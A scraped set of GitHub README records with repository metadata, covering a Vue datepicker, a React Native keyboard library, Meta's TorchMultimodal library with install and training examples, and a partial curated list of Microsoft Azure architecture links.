<a href="https://probml.github.io/pml-book/book2.html">book 2</a>
(see "releases" tab on RHS).
This lets me keep track of downloads and issues
in a way which can be tracked separately from
<a href="https://probml.github.io/pml-book/book1.html">book 1</a>.
| Probabilistic Machine Learning: Advanced Topics | null | 33 | 5 | 0 | 24 | 43 | 1 | 0 |
Vuepic/vue-datepicker | ## @vuepic/vue-datepicker
### The most complete datepicker solution for Vue 3
[![License](https://img.shields.io/npm/l/@vuepic/vue-datepicker)](https://github.com/Vuepic/vue-datepicker/blob/main/LICENSE) [![npm](https://img.shields.io/npm/v/@vuepic/vue-datepicker)](https://www.npmjs.com/package/@vuepic/vue-datepicker) ![Downloads](https://img.shields.io/npm/dm/@vuepic/vue-datepicker) [![Open issues](https://img.shields.io/github/issues-raw/Vuepic/vue-datepicker)](https://github.com/Vuepic/vue-datepicker/issues) ![CI](https://img.shields.io/github/actions/workflow/status/Vuepic/vue-datepicker/node.js.yml?branch=main&label=CI) ![Release date](https://img.shields.io/github/release-date/Vuepic/vue-datepicker)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=Vuepic_vue-datepicker&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=Vuepic_vue-datepicker)
[DOCUMENTATION](https://vue3datepicker.com/)
[StackBlitz Playground](https://stackblitz.com/edit/vuepic-vue-datepicker?file=src%2Fcomponents%2FPlayground.vue)
## Features
- Single date picker
- Range date picker
- Time picker
- Month picker
- Year picker
- Quarter picker
- Week picker
- Multiple dates select
- Multiple calendars
- Text input
- UTC support
- Timezones
- Locale support
- Week numbers
- Custom `v-model`
- Dark and light theme
- SSR support
- Highly configurable
- Accessible
- Included type definitions
## Install
```shell
# npm
npm install @vuepic/vue-datepicker
# yarn
yarn add @vuepic/vue-datepicker
# pnpm
pnpm add @vuepic/vue-datepicker
# bun
bun add @vuepic/vue-datepicker
```
### Import and register component
**Global**
```js
import { createApp } from 'vue';
import App from './App.vue';
import VueDatePicker from '@vuepic/vue-datepicker';
import '@vuepic/vue-datepicker/dist/main.css';
const app = createApp(App);
app.component('VueDatePicker', VueDatePicker);
```
**Local**
```vue
<template>
<VueDatePicker v-model="date" />
</template>
<script setup>
import { ref } from 'vue';
import VueDatePicker from '@vuepic/vue-datepicker';
import '@vuepic/vue-datepicker/dist/main.css';
const date = ref(null);
</script>
```
## Supporting the project
As you may know, maintaining an open-source project is a very time-consuming job. Your support is very appreciated ❤️
Please ⭐️ this repository if you like the component!
You can also make a financial contribution via sponsoring this project or one time donation. [Become a sponsor](https://github.com/sponsors/Vuepic)
Special thanks to our sponsors 🙏
<a href="https://hapio.io/" target="_blank">
<img src="https://avatars.githubusercontent.com/u/99868704?s=200&v=4" width="80" alt="Hapio">
</a>
<a href="https://datagridvue.com/" target="_blank">
<img src="https://raw.githubusercontent.com/nruffing/data-grid-vue/049baf296f814e3b03faf48632a7508305e14ffc/vuepress/.vuepress/public/favicon.svg" width="80" alt="Data Grid Vue
">
</a>
## Contributors
Thanks to all people who contributed to the project 🙏
<a href="https://github.com/Vuepic/vue-datepicker/graphs/contributors">
<img src="https://contrib.rocks/image?repo=Vuepic/vue-datepicker" alt="contributors" />
</a>
## Versioning
This project follows [SemVer](https://semver.org) specification
## License
Copyright © 2021-present [Vuepic](https://github.com/Vuepic)
[MIT](https://github.com/Vuepic/vue-datepicker/blob/master/LICENSE)
| Datepicker component for Vue 3 | vue,datetime,timepicker,datepicker,daterangepicker,datetimepicker,vue-datepicker,vue3,vue-datetimepicker | 76 | 40 | 67 | 1,644 | 14 | 2 | 3 |
kirillzyusko/react-native-keyboard-controller | # react-native-keyboard-controller
Keyboard manager which works in identical way on both iOS and Android.
## Demonstration
<img src="./gifs/demo.gif?raw=true" width="60%">
## Key features
- mapping keyboard movement to animated values 😎
- missing `keyboardWillShow` / `keyboardWillHide` events are available on Android 😍
- module for changing soft input mode on Android 🤔
- reanimated support 🚀
- interactive keyboard dismissing 👆📱
- prebuilt components (`KeyboardStickyView`, `KeyboardAwareScrollView`, re-worked `KeyboardAvoidingView`) 📚
- `KeyboardToolbar` with easy behavior customization of _**previous**_, _**next**_ and _**done**_ buttons in the keyboard toolbar 📐
- easy focused input information retrieval 📝 🔮
- works with any navigation library 🧭
- and more is coming... Stay tuned! 😊
## Installation
Install `react-native-keyboard-controller` package from npm:
```shell
yarn add react-native-keyboard-controller
# or
npm install react-native-keyboard-controller --save
```
## Documentation
Check out our dedicated documentation page for info about this library, API reference and more: [https://kirillzyusko.github.io/react-native-keyboard-controller/](https://kirillzyusko.github.io/react-native-keyboard-controller/)
## Contributing
See the [contributing guide](CONTRIBUTING.md) to learn how to contribute to the repository and the development workflow.
## License
MIT
| Keyboard manager which works in identical way on both iOS and Android | animation,keyboard,react-native,android,ios,focused-input,avoiding-view,keyboard-toolbar | 54 | 15 | 335 | 384 | 15 | 25 | 19 |
facebookresearch/multimodal | [![Unit-tests](https://github.com/facebookresearch/multimodal/actions/workflows/unit_test.yaml/badge.svg)](https://github.com/facebookresearch/multimodal/actions/workflows/unit_test.yaml)
[![Python version](https://img.shields.io/pypi/pyversions/torchmultimodal-nightly.svg)](https://www.python.org/downloads/)
[![Downloads](https://static.pepy.tech/personalized-badge/torchmultimodal-nightly?period=total&units=international_system&left_color=blue&right_color=orange&left_text=Downloads%20(nightly))](https://pepy.tech/project/torchmultimodal-nightly)
# TorchMultimodal (Beta Release)
[**Models**](#models) | [**Example scripts**](#example-scripts) | [**Getting started**](#getting-started) | [**Code overview**](#code-overview) | [**Installation**](#installation) | [**Contributing**](#contributing) | [**License**](#license)
## Introduction
**TorchMultimodal** is a PyTorch library for training state-of-the-art multimodal multi-task models at scale, including both content understanding and generative models. TorchMultimodal contains:
- A repository of modular and composable building blocks (fusion layers, loss functions, datasets and utilities).
- A collection of common multimodal model classes built up from said building blocks with pretrained weights for canonical configurations.
- A set of examples that show how to combine these building blocks with components and common infrastructure from across the PyTorch Ecosystem to replicate state-of-the-art models published in the literature. These examples should serve as baselines for ongoing research in the field, as well as a starting point for future work.
## Models
TorchMultimodal contains a number of models, including
- ALBEF: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/albef/model.py#L55), [paper](https://arxiv.org/abs/2107.07651)
- BLIP-2: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/blip2/blip2.py#L39), [paper]()
- CLIP: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/clip/model.py#L37), [paper](https://arxiv.org/abs/2301.12597)
- CoCa: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/coca/coca_model.py#L33), [paper](https://arxiv.org/abs/2205.01917)
- DALL-E 2: [model](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/diffusion_labs/models/dalle2/dalle2_decoder.py#L19), [paper](https://arxiv.org/abs/2204.06125)
- FLAVA: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/flava/model.py#L106), [paper](https://arxiv.org/abs/2112.04482)
- MAE/Audio MAE: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/masked_auto_encoder/model.py#L42), [MAE paper](https://arxiv.org/abs/2111.06377), [Audio MAE paper](https://arxiv.org/abs/2207.06405)
- MDETR: [model class](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/models/mdetr/model.py#L37), [paper](https://arxiv.org/abs/2104.12763)
## Example scripts
In addition to the above models, we provide example scripts for training, fine-tuning, and evaluation of models on popular multimodal tasks. Examples can be found under [examples/](https://github.com/facebookresearch/multimodal/tree/main/examples) and include
| Model | Supported Tasks |
| :--------------------------------------: | :----------------------: |
| ALBEF | [Retrieval](https://github.com/facebookresearch/multimodal/blob/main/examples/albef/README.md#retrieval) <br/> [Visual Question Answering](https://github.com/facebookresearch/multimodal/blob/main/examples/albef/README.md#visual-question-answering) |
| DDPM | [Training and Inference](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/diffusion_labs/mnist_training.ipynb) (notebook)
| FLAVA | [Pretraining](https://github.com/facebookresearch/multimodal/tree/main/examples/flava#launching-and-test-pretraining) <br/> [Fine-tuning](https://github.com/facebookresearch/multimodal/tree/main/examples/flava#finetuning) <br/> [Zero-shot](https://github.com/facebookresearch/multimodal/tree/main/examples/flava#coco-zero-shot)|
| MDETR | [Phrase grounding](https://github.com/facebookresearch/multimodal/tree/main/examples/mdetr#phrase-grounding) <br/> [Visual Question Answering](https://github.com/facebookresearch/multimodal/blob/main/examples/mdetr/vqa_finetune.py#L154) |
| MUGEN | [Text-to-video retrieval](https://github.com/facebookresearch/multimodal/tree/main/examples/mugen/retrieval#mugen-retrieval) <br/> [Text-to-video generation](https://github.com/facebookresearch/multimodal/tree/main/examples/mugen/generation#text-to-video-generation-with-mugen) |
| Omnivore | [Pre-training](https://github.com/facebookresearch/multimodal/tree/main/examples/omnivore#training) <br/> [Evaluation](https://github.com/facebookresearch/multimodal/tree/main/examples/omnivore#evaluating-pretrained-weight) |
## Getting started
Below we give minimal examples of how you can write a simple training or zero-shot evaluation script using components from TorchMultimodal.
<details>
<summary>FLAVA zero-shot example</summary>
```python
import torch
from PIL import Image
from torchmultimodal.models.flava.model import flava_model
from torchmultimodal.transforms.bert_text_transform import BertTextTransform
from torchmultimodal.transforms.flava_transform import FLAVAImageTransform
# Define helper function for zero-shot prediction
def predict(zero_shot_model, image, labels):
zero_shot_model.eval()
with torch.no_grad():
image = image_transform(img)["image"].unsqueeze(0)
texts = text_transform(labels)
_, image_features = zero_shot_model.encode_image(image, projection=True)
_, text_features = zero_shot_model.encode_text(texts, projection=True)
scores = image_features @ text_features.t()
probs = torch.nn.Softmax(dim=-1)(scores)
label = labels[torch.argmax(probs)]
print(
"Label probabilities: ",
{labels[i]: probs[:, i] for i in range(len(labels))},
)
print(f"Predicted label: {label}")
image_transform = FLAVAImageTransform(is_train=False)
text_transform = BertTextTransform()
zero_shot_model = flava_model(pretrained=True)
img = Image.open("my_image.jpg") # point to your own image
predict(zero_shot_model, img, ["dog", "cat", "house"])
# Example output:
# Label probabilities: {'dog': tensor([0.80590]), 'cat': tensor([0.0971]), 'house': tensor([0.0970])}
# Predicted label: dog
```
</details>
<details>
<summary>MAE training example</summary>
```python
import torch
from torch.utils.data import DataLoader
from torchmultimodal.models.masked_auto_encoder.model import vit_l_16_image_mae
from torchmultimodal.models.masked_auto_encoder.utils import (
CosineWithWarmupAndLRScaling,
)
from torchmultimodal.modules.losses.reconstruction_loss import ReconstructionLoss
from torchmultimodal.transforms.mae_transform import ImagePretrainTransform
mae_transform = ImagePretrainTransform()
dataset = MyDatasetClass(transforms=mae_transform) # you should define this
dataloader = DataLoader(dataset, batch_size=8)
# Instantiate model and loss
mae_model = vit_l_16_image_mae()
mae_loss = ReconstructionLoss()
# Define optimizer and lr scheduler
optimizer = torch.optim.AdamW(mae_model.parameters())
lr_scheduler = CosineWithWarmupAndLRScaling(
optimizer, max_iters=1000, warmup_iters=100 # you should set these
)
# Train one epoch
for batch in dataloader:
model_out = mae_model(batch["images"])
loss = mae_loss(model_out.decoder_pred, model_out.label_patches, model_out.mask)
loss.backward()
optimizer.step()
lr_scheduler.step()
```
</details>
## Code overview
### [torchmultimodal/diffusion_labs](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/diffusion_labs)
diffusion_labs contains components for building diffusion models. For more details on these components, see [diffusion_labs/README.md](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/diffusion_labs/README.md).
### [torchmultimodal/models](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/models)
Look here for model classes as well as any other modeling code specific to a given architecture. E.g. the directory [torchmultimodal/models/blip2](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/models/blip2) contains modeling components specific to BLIP-2.
### [torchmultimodal/modules](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules)
Look here for common generic building blocks that can be stitched together to build a new architecture. This includes [layers](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules/layers) like [codebooks](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/layers/codebook.py#L31), [patch embeddings](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/layers/patch_embedding.py#L26), or [transformer encoder/decoders](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/layers/transformer.py), [losses](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules/losses) like [contrastive loss with temperature](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/losses/contrastive_loss_with_temperature.py#L121) or [reconstruction loss](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/losses/reconstruction_loss.py#L10), [encoders]() like [ViT](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/encoders/vision_transformer.py#L20) and [BERT](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/encoders/bert_text_encoder.py#L17), and [fusion modules](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules/fusions) like [Deep Set fusion](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/modules/fusions/deepset_fusion.py#L14).
### [torchmultimodal/transforms](https://github.com/facebookresearch/multimodal/tree/main/torchmultimodal/modules)
Look here for common data transforms from popular models, e.g. [CLIP](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/transforms/clip_transform.py#L349), [FLAVA](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/transforms/flava_transform.py#L206), and [MAE](https://github.com/facebookresearch/multimodal/blob/main/torchmultimodal/transforms/mae_transform.py#L84).
## Installation
TorchMultimodal requires Python >= 3.8. The library can be installed with or without CUDA support.
The following assumes conda is installed.
### Prerequisites
1. Install conda environment
```
conda create -n torch-multimodal python=\<python_version\>
conda activate torch-multimodal
```
2. Install pytorch, torchvision, and torchaudio. See [PyTorch documentation](https://pytorch.org/get-started/locally/).
```
# Use the current CUDA version as seen [here](https://pytorch.org/get-started/locally/)
# Select the nightly Pytorch build, Linux as the OS, and conda. Pick the most recent CUDA version.
conda install pytorch torchvision torchaudio pytorch-cuda=\<cuda_version\> -c pytorch-nightly -c nvidia
# For CPU-only install
conda install pytorch torchvision torchaudio cpuonly -c pytorch-nightly
```
### Install from binaries
Nightly binary on Linux for Python 3.8 and 3.9 can be installed via pip wheels.
For now we only support Linux platform through [PyPI](https://pypi.org/).
```
python -m pip install torchmultimodal-nightly
```
### Building from Source
Alternatively, you can also build from our source code and run our [examples](https://github.com/facebookresearch/multimodal/tree/main/examples):
```
git clone --recursive https://github.com/facebookresearch/multimodal.git multimodal
cd multimodal
pip install -e .
```
For developers please follow the [development installation](https://github.com/facebookresearch/multimodal/blob/main/CONTRIBUTING.md#development-installation).
## Contributing
We welcome any feature requests, bug reports, or pull requests from the community. See the [CONTRIBUTING](CONTRIBUTING.md) file for how to help out.
## License
TorchMultimodal is BSD licensed, as found in the [LICENSE](LICENSE) file.
| TorchMultimodal is a PyTorch library for training state-of-the-art multimodal multi-task models at scale. | null | 0 | 45 | 489 | 377 | 8 | 103 | 3 |
lukemurraynz/awesome-azure-architecture | ![Awesome Azure Architecture](./Awesome_Azure_Architecture.png)
# Awesome Microsoft Azure Architecture [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) <!-- omit in toc -->
This is a curated list of AWESOME blogs, videos, tutorials, code, tools, and scripts related to the design and implementation of solutions in Microsoft Azure.
This list contains anything that can help with your **Microsoft Azure architecture** and quickly get you up and running when designing, planning, and implementing services that empower organizations around the planet to achieve more.
This list can be found at [aka.ms/AwesomeAzureArchitecture](https://aka.ms/AwesomeAzureArchitecture).
> Community [contributions](contributing.md) are most welcome! Feel free to submit a **pull request** with any adds/removes/changes to content!
## Contents
- [Official](#official)
- [Official Microsoft Learn Modules](#official-microsoft-learn-modules)
- [Official Docs](#official-docs)
- [Official Videos](#official-videos)
- [Official Announcements and Articles](#official-announcements-and-articles)
- [Official Books](#official-books)
- [Official Repositories and Tools](#official-repositories-and-tools)
- [Official Forums and Feedback](#official-forums-and-feedback)
- [Official Meetups and Calls](#official-meetups-and-calls)
- [Official Podcasts](#official-podcasts)
- [Community](#community)
- [Community Videos](#community-videos)
- [Community Podcasts](#community-podcasts)
- [Community Books](#community-books)
- [Community Articles](#community-articles)
- [Community Repositories and Tools](#community-repositories-and-tools)
- [Community Newsletter](#community-newsletter)
- [Community Forums](#community-forums)
- [Community Discord](#community-discord)
- [Community Slack](#community-slack)
## Official
> Links below are from official Microsoft sources, websites, and channels.
### Official Microsoft Learn Modules
Official Microsoft Learn Learning modules.
- [AZ-305: Design business continuity solutions](https://learn.microsoft.com/en-us/training/paths/design-business-continuity-solutions/?WT.mc_id=AZ-MVP-5004796)
- [AZ-305: Design data storage solutions](https://learn.microsoft.com/en-us/training/paths/design-data-storage-solutions/?WT.mc_id=AZ-MVP-5004796)
- [AZ-305: Design identity, governance, and monitor solutions](https://learn.microsoft.com/en-us/training/paths/design-identity-governance-monitor-solutions/?WT.mc_id=AZ-MVP-5004796)
- [AZ-305: Design infrastructure solutions](https://learn.microsoft.com/en-us/training/paths/design-infranstructure-solutions/?WT.mc_id=AZ-MVP-5004796)
- [AZ-700 Designing and Implementing Microsoft Azure Networking Solutions](https://learn.microsoft.com/en-us/training/paths/design-implement-microsoft-azure-networking-solutions-az-700/?WT.mc_id=AZ-MVP-5004796)
- [AZ-720: Azure Support Engineer for Connectivity Specialty](https://learn.microsoft.com/en-us/training/paths/azure-support-engineer-for-connectivity-specialty/?WT.mc_id=AZ-MVP-5004796)
- [Control Azure spending and manage bills with Microsoft Cost Management + Billing](https://learn.microsoft.com/en-us/training/paths/control-spending-manage-bills/?WT.mc_id=AZ-MVP-5004796)
- [Describe core Azure architectural components](https://learn.microsoft.com/en-us/training/modules/azure-architecture-fundamentals/?WT.mc_id=AZ-MVP-5004796)
- [Design an enterprise governance strategy](https://learn.microsoft.com/en-us/training/modules/enterprise-governance/?WT.mc_id=AZ-MVP-5004796)
- [Linux on Azure](https://learn.microsoft.com/en-us/learn/paths/azure-linux/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure - Microsoft Learn](https://learn.microsoft.com/en-us/training/paths/azure-linux/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Connected Learning Experience (CLX)](https://clx.cloudevents.ai/events/39366311-ad15-4b90-9364-0252213842fa?wt.mc_id=AZ-MVP-5004796)
- [Microsoft Certifications](https://learn.microsoft.com/en-us/certifications/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Partner - Training Center - Role Based](https://partner.microsoft.com/en-us/training/training-center?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Technical Quest](https://mtq.microsoft.com/?WT.mc_id=AZ-MVP-5004796)
### Official Docs
Official Microsoft Learn, articles, blogs, and resources.
- [AI Lab project: Responsible AI dashboard](https://www.microsoft.com/en-us/ai/ai-lab-responsible-ai-dashboard?WT.mc_id=AZ-MVP-5004796)
- [Architect multitenant solutions on Azure](https://aka.ms/multitenancy?WT.mc_id=AZ-MVP-5004796)
- [Automation adoption strategy](https://learn.microsoft.com/en-us/power-platform/guidance/automation-coe/strategy?WT.mc_id=AZ-MVP-5004796)
- [Azure Arc](https://azure.microsoft.com/en-us/services/azure-arc/?WT.mc_id=AZ-MVP-5004796)
- [Azure Arc landing zone accelerator for hybrid and multicloud](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/scenarios/hybrid/enterprise-scale-landing-zone?WT.mc_id=AZ-MVP-5004796)
- [Azure Architecture Center](https://learn.microsoft.com/en-us/azure/architecture/?WT.mc_id=AZ-MVP-5004796)
- [Azure Architecture reference architecture](https://learn.microsoft.com/en-us/azure/architecture/browse/?WT.mc_id=AZ-MVP-5004796)
- [Azure Bicep](https://learn.microsoft.com/en-us/azure/azure-resource-manager/bicep/?WT.mc_id=AZ-MVP-5004796)
- [Azure Chaos Studio documentation](https://learn.microsoft.com/en-us/azure/chaos-studio/?WT.mc_id=AZ-MVP-5004796)
- [Azure compliance documentation](https://learn.microsoft.com/en-us/azure/compliance/?WT.mc_id=AZ-MVP-5004796)
- [Azure confidential computing](https://azure.microsoft.com/en-us/solutions/confidential-compute/?WT.mc_id=AZ-MVP-5004796#overview)
- [Azure Database Migration Guides](https://learn.microsoft.com/en-us/data-migration/?WT.mc_id=AZ-MVP-5004796)
- [Azure for Partners](https://partner.microsoft.com/en-us/solutions/azure)
- [Azure Governance](https://learn.microsoft.com/en-us/azure/governance/?WT.mc_id=AZ-MVP-5004796)
- [Azure IP advantage](https://azure.microsoft.com/en-us/overview/azure-ip-advantage/?WT.mc_id=AZ-MVP-5004796)
- [Azure Lighthouse](https://learn.microsoft.com/en-us/azure/lighthouse/?WT.mc_id=AZ-MVP-5004796)
- [Azure Migrate](https://azure.microsoft.com/en-us/services/azure-migrate/?WT.mc_id=AZ-MVP-5004796)
- [Azure Migration Tool Comparison Matrix](https://aka.ms/comparemigrationtools?WT.mc_id=AZ-MVP-5004796)
- [Azure OpenAI Landing Zone reference architecture](https://techcommunity.microsoft.com/t5/azure-architecture-blog/azure-openai-landing-zone-reference-architecture/ba-p/3882102?WT.mc_id=AZ-MVP-5004796)
- [Azure products](https://azure.microsoft.com/en-us/services/?WT.mc_id=AZ-MVP-5004796)
- [Azure security baseline for Azure Virtual Desktop](https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/virtual-desktop-security-baseline?WT.mc_id=AZ-MVP-5004796)
- [Azure security best practices](https://learn.microsoft.com/en-gb/azure/cloud-adoption-framework/secure/security-top-10?WT.mc_id=AZ-MVP-5004796)
- [Azure security documentation](https://learn.microsoft.com/en-us/azure/security/?WT.mc_id=AZ-MVP-5004796)
- [Azure Service-level agreements](https://azure.microsoft.com/en-us/support/legal/sla/?WT.mc_id=AZ-MVP-5004796)
- [Azure sustainability](https://azure.microsoft.com/en-gb/global-infrastructure/sustainability/?WT.mc_id=AZ-MVP-5004796)
- [Azure Table storage design](https://learn.microsoft.com/en-us/azure/storage/tables/table-storage-design?WT.mc_id=AZ-MVP-5004796)
- [Azure Virtual Datacenter](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/resources/vdc?WT.mc_id=AZ-MVP-5004796)
- [Azure VMware Solution landing zone accelerator](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/scenarios/azure-vmware/enterprise-scale-landing-zone?WT.mc_id=AZ-MVP-5004796)
- [Azure VMware Solution](https://azure.microsoft.com/en-us/services/azure-vmware/?WT.mc_id=AZ-MVP-5004796)
- [Azure application architecture fundamentals](https://learn.microsoft.com/en-us/azure/architecture/guide/?WT.mc_id=AZ-MVP-5004796)
- [Azure architecture icons](https://learn.microsoft.com/en-us/azure/architecture/icons/?WT.mc_id=AZ-MVP-5004796)
- [Azure Verified Modules](https://aka.ms/AVM)
- [Best practices in cloud applications](https://learn.microsoft.com/en-us/azure/architecture/best-practices/index-best-practices?WT.mc_id=AZ-MVP-5004796)
- [Cloud Design Patterns](https://learn.microsoft.com/en-us/azure/architecture/patterns/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Services Due Diligence Checklist](https://www.microsoft.com/en-nz/trust-center/compliance/due-diligence-checklist?WT.mc_id=AZ-MVP-5004796)
- [Cloud economics](https://azure.microsoft.com/solutions/cloud-economics/?WT.mc_id=AZ-MVP-5004796#overview)
- [Compute decision tree](https://learn.microsoft.com/en-us/azure/architecture/guide/technology-choices/compute-decision-tree?WT.mc_id=AZ-MVP-5004796)
- [Create an Azure support ticket](https://azure.microsoft.com/en-us/support/create-ticket/?WT.mc_id=AZ-MVP-5004796)
- [Data decision tree](https://learn.microsoft.com/en-us/azure/architecture/guide/technology-choices/data-store-decision-tree?WT.mc_id=AZ-MVP-5004796)
- [Design for reliability](https://learn.microsoft.com/en-us/azure/architecture/framework/resiliency/design-checklist?WT.mc_id=AZ-MVP-5004796)
- [Develop your naming and tagging strategy for Azure resources](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging?WT.mc_id=AZ-MVP-5004796)
- [DevOps checklist](https://learn.microsoft.com/en-us/azure/architecture/checklist/dev-ops?WT.mc_id=AZ-MVP-5004796)
- [Hands-on with AI](https://aidemos.microsoft.com/?WT.mc_id=AZ-MVP-5004796)
- [Hardware innovation for the cloud](https://azure.microsoft.com/en-us/global-infrastructure/hardware-innovation/?WT.mc_id=AZ-MVP-5004796)
- [Mainframe rehosting on Azure virtual machines](https://learn.microsoft.com/en-us/azure/virtual-machines/workloads/mainframe-rehosting/overview?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Assessments](https://learn.microsoft.com/en-us/assessments/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Bounty Program](https://microsoft.com/en-us/msrc/bounty-microsoft-azure?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Immersion Workshops](https://partner.microsoft.com/en-nz/solutions/azure/aiw?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Support](https://azure.microsoft.com/en-us/support/options/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Well-Architected Framework](https://learn.microsoft.com/en-us/azure/architecture/framework/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Cloud Adoption Framework for Azure](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Digital Defense Report](https://www.microsoft.com/en-us/security/business/microsoft-digital-defense-report?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Investor Relations](https://www.microsoft.com/en-us/investor?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Partner Resources](https://microsoft.github.io/PartnerResources/)
- [Microsoft Product/Licensing Terms](https://www.microsoft.com/licensing/terms/welcome/welcomepage?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Trust Center](https://www.microsoft.com/en-us/trust-center?WT.mc_id=AZ-MVP-5004796)
- [Serverless design examples](https://learn.microsoft.com/en-us/dotnet/architecture/serverless/serverless-design-examples?WT.mc_id=AZ-MVP-5004796)
- [Solutions and Training for Azure Active Directory B2C](https://learn.microsoft.com/en-us/azure/active-directory-b2c/solution-articles?WT.mc_id=AZ-MVP-5004796)
- [Subscription decision guide](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/decision-guides/subscriptions/?WT.mc_id=AZ-MVP-5004796)
- [Ten design principles for Azure applications](https://learn.microsoft.com/en-us/azure/architecture/guide/design-principles/?WT.mc_id=AZ-MVP-5004796)
- [Virtual Microsoft Datacenter Tour](https://news.microsoft.com/stories/microsoft-datacenter-tour/?WT.mc_id=AZ-MVP-5004796)
- [Visual Studio subscriptions](https://azure.microsoft.com/en-us/services/developer-tools/visual-studio-subscriptions/?WT.mc_id=AZ-MVP-5004796)
### Official Videos
Official Microsoft videos.
- [AI Show](https://learn.microsoft.com/en-us/shows/ai-show/?WT.mc_id=AZ-MVP-5004796)
- [Ask The Expert](https://learn.microsoft.com/en-us/shows/ask-the-expert/?WT.mc_id=AZ-MVP-5004796)
- [Azure Enablement Show](https://learn.microsoft.com/en-us/shows/azure-enablement/?WT.mc_id=AZ-MVP-5004796)
- [Azure Friday](https://learn.microsoft.com/en-us/shows/azure-friday/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Training Events](https://www.microsoft.com/en-au/business/learn/cloud-training-events/?WT.mc_id=AZ-MVP-5004796)
- [Code Stories](https://learn.microsoft.com/en-us/shows/CodeStories/?WT.mc_id=AZ-MVP-5004796)
- [Exam Readiness Zone](https://learn.microsoft.com/en-us/shows/exam-readiness-zone/?WT.mc_id=AZ-MVP-5004796)
- [Inside Azure Datacenter Architecture with Mark Russinovich](https://www.youtube.com/watch?v=69PrhWQorEM)
- [Inside Azure for IT](https://learn.microsoft.com/en-us/shows/inside-azure-for-it/?WT.mc_id=AZ-MVP-5004796)
- [Internet of Things Show](https://learn.microsoft.com/en-us/shows/internet-of-things-show/?WT.mc_id=AZ-MVP-5004796)
- [Learn TV](https://learn.microsoft.com/en-us/learn/tv/?WT.mc_id=AZ-MVP-5004796)
- [Preparing for Azure advanced specializations](https://partner.microsoft.com/en-us/training/assets/collection/preparing-for-azure-advanced-specializations#/)
- [Reactor](https://learn.microsoft.com/en-us/shows/reactor/?WT.mc_id=AZ-MVP-5004796)
- [The DevOps Lab](https://learn.microsoft.com/en-us/shows/devops-lab/?WT.mc_id=AZ-MVP-5004796)
### Official Announcements and Articles
Official Microsoft feature and product announcement pages and what's new.
- [Azure Backup Center - Backups and Good Governance](https://techcommunity.microsoft.com/t5/itops-talk-blog/azure-backup-center-backups-and-good-governance/ba-p/2318843?WT.mc_id=AZ-MVP-5004796)
- [On Prem To the Cloud: Everything As Code](https://devblogs.microsoft.com/devops/on-prem-to-the-cloud-everything-as-code-ep-4/?WT.mc_id=AZ-MVP-5004796)
### Official Books
Official Microsoft ebooks and whitepapers.
- [Architecting Modern Web Applications with ASP.NET Core and Microsoft Azure](https://dotnet.microsoft.com/en-us/download/e-book/aspnet/pdf?WT.mc_id=AZ-MVP-500479)
- [Azure for Architects](https://azure.microsoft.com/en-us/resources/azure-for-architects/?WT.mc_id=AZ-MVP-5004796)
- [Azure Resiliency – Business Continuity and Disaster Recovery](https://azure.microsoft.com/en-us/resources/resilience-in-azure-whitepaper/?WT.mc_id=AZ-MVP-5004796)
- [Azure SQL Resource Kit](https://azure.microsoft.com/en-us/resources/azure-sql-resource-kit/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Migration and Modernization with Microsoft Azure e-book](https://azure.microsoft.com/en-us/resources/cloud-migration-and-modernization-with-microsoft-azure-e-book/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Migration Simplified](https://azure.microsoft.com/en-us/resources/cloud-migration-simplified/?WT.mc_id=AZ-MVP-5004796)
